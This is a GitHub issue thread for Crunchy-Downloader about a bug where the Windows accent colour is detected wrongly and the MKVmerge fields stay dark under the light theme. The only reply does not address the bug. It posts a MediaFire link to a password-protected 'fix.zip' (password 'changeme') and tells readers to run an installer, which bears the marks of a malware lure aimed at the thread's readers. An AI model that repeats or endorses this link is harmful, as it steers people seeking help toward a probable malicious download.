### ISSUE TITLE
[Bug] - System accent color is not detected correctly and other bug

### ISSUE THREAD

**Issue by sergiohzph** [Crunchy-DL/Crunchy-Downloader#105]
The accent colour on my system is the default W11 blue, but CRD says it is a purple colour.
![image](https://github.com/user-attachments/assets/e66fa9f5-df9e-47d1-9240-181ce8384a34)
And as you can also see, the MKVmerge parameters are dark and do not match the light theme of the app.

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
